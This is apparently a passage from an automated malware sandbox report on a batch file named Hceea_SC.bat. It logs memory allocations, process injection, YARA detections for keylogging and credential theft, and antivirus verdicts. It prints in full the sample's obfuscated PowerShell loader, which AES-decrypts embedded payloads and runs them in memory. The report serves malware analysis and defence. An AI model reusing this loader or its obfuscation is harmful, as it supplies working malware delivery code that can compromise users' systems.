NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 7:46 a.m.	process_identifier: 2852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2023, 7:46 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Steal credential	rule	local_credential_Steal
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Steal credential	rule	local_credential_Steal
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat.exe" -w hidden -c $pEMo='TraMBJvnsfMBJvorMBJvmFMBJvinaMBJvlBlMBJvoMBJvckMBJv'.Replace('MBJv', '');$iyaC='LMBJvoMBJvadMBJv'.Replace('MBJv', '');$tcQw='RMBJveadLMBJviMBJvneMBJvsMBJv'.Replace('MBJv', '');$KuMS='CMBJvhMBJvangMBJveEMBJvxMBJvtenMBJvsioMBJvnMBJv'.Replace('MBJv', '');$trmt='CreMBJvateDMBJvecMBJvrMBJvypMBJvtorMBJv'.Replace('MBJv', '');$fUaA='GeMBJvtMBJvCurMBJvrentMBJvProMBJvcMBJveMBJvssMBJv'.Replace('MBJv', '');$jFAl='EMBJvleMBJvmeMBJvntAMBJvtMBJv'.Replace('MBJv', '');$GMsR='SplMBJvitMBJv'.Replace('MBJv', '');$SgZi='EntMBJvrMBJvyMBJvPMBJvoMBJvinMBJvtMBJv'.Replace('MBJv', '');$AotJ='FrMBJvomBaMBJvsMBJve6MBJv4StMBJvriMBJvngMBJv'.Replace('MBJv', '');$NumX='MMBJvainMBJvModMBJvulMBJveMBJv'.Replace('MBJv', '');$SCtU='IMBJvnvMBJvokMBJveMBJv'.Replace('MBJv', '');function gYYuy($Ztzwf){$NuTmR=[System.Security.Cryptography.Aes]::Create();$NuTmR.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NuTmR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NuTmR.Key=[System.Convert]::$AotJ('9RE7z9qQbXo70lNlRZf0jPT2QRG4KCsVkZBJkUBk4l4=');$NuTmR.IV=[System.Convert]::$AotJ('A1++iPLzbLBcVKc2yItI3g==');$BvNdb=$NuTmR.$trmt();$wrDar=$BvNdb.$pEMo($Ztzwf,0,$Ztzwf.Length);$BvNdb.Dispose();$NuTmR.Dispose();$wrDar;}function pFMIH($Ztzwf){$XcMqn=New-Object System.IO.MemoryStream(,$Ztzwf);$ffVFP=New-Object System.IO.MemoryStream;$MiwFe=New-Object System.IO.Compression.GZipStream($XcMqn,[IO.Compression.CompressionMode]::Decompress);$MiwFe.CopyTo($ffVFP);$MiwFe.Dispose();$XcMqn.Dispose();$ffVFP.Dispose();$ffVFP.ToArray();}$uxbhR=[System.Linq.Enumerable]::$jFAl([System.IO.File]::$tcQw([System.IO.Path]::$KuMS([System.Diagnostics.Process]::$fUaA().$NumX.FileName, $null)), 1);$XmldQ=$uxbhR.Substring(2).$GMsR(':');$bUPcU=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[0])));$LzWhx=pFMIH (gYYuy ([Convert]::$AotJ($XmldQ[1])));[System.Reflection.Assembly]::$iyaC([byte[]]$LzWhx).$SgZi.$SCtU($null,$null);[System.Reflection.Assembly]::$iyaC([byte[]]$bUPcU).$SgZi.$SCtU($null,$null);

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hceea_SC.bat

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

Avast	BV:Obfuscated-N [Cryp]
BitDefender	Trojan.GenericKD.67626610
MicroWorld-eScan	Trojan.GenericKD.67626610
Emsisoft	Trojan.GenericKD.67626610 (B)
VIPRE	Trojan.GenericKD.67626610
FireEye	Trojan.GenericKD.67626610
GData	Trojan.GenericKD.67626610
Arcabit	Trojan.Generic.D407E672
Microsoft	Trojan:Win32/Vigorf.A
MAX	malware (ai score=80)
AVG	BV:Obfuscated-N [Cryp]

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2644 resumed a thread in remote process 2756
NtResumeThread June 21, 2023, 7:46 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2756	1	0	0

Hceea_SC.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All